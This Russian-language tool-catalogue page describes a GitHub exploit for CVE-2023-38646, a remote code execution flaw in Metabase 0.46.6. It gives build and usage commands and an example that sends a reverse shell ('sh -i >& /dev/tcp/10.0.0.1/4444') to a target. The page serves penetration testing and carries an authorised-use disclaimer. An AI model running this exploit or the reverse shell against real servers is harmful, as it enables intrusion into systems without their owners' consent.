Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-38646 — Эксплойт для CVE-2023-38646 в Metabase 0.46.6, обеспечивающий удалённое выполнение кода через специально сформированные запросы и получение токена настройки. | Kitploit
Инструменты/GitHubGitHub/danithehack3r/cve-2023-38646
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеТроян Удаленного Доступа
GitHubdanithehack3r/cve-2023-38646

CVE-2023-38646

Эксплойт для CVE-2023-38646 в Metabase 0.46.6, обеспечивающий удалённое выполнение кода через специально сформированные запросы и получение токена настройки.

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-38646

Эксплойт для CVE-2023-38646 Metabase 0.46.6

Этот инструмент эксплуатирует уязвимость (CVE-2023-38646) в программной платформе. Эксплойт позволяет выполнять удалённый код с помощью специально сформированного запроса, используя некорректную обработку строки подключения к базе данных.

Обзор

Инструмент:

  • Получает setup-токен с целевого URL.
  • Кодирует указанную команду в Base64.
  • Формирует полезную нагрузку с закодированной командой.
  • Отправляет полезную нагрузку для эксплуатации уязвимости.

Установка

Клонируйте репозиторий:

root@kitploit:~
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit

Использование

root@kitploit:~
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]

TARGET_URL: URL платформы, которую необходимо просканировать и эксплуатировать. COMMAND: Команда, которую необходимо выполнить на цели. PROXY_URL (Необязательно): URL прокси-сервера (например, http://127.0.0.1:8080). Если не указан, прокси использоваться не будет.

Пример с sh reverse shell

root@kitploit:~
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080

Отказ от ответственности

Этот инструмент предназначен только для образовательных и исследовательских целей. Всегда убедитесь, что у вас есть соответствующие разрешения перед сканированием или эксплуатацией любой цели. Неправомерное использование этого инструмента строго противоречит намерениям разработчика и может быть незаконным.

Обратная связь и вклад

Не стесняйтесь открывать issues для любых отзывов, сообщений об ошибках или запросов функций. Pull request'ы всегда приветствуются!

Скачать инструмент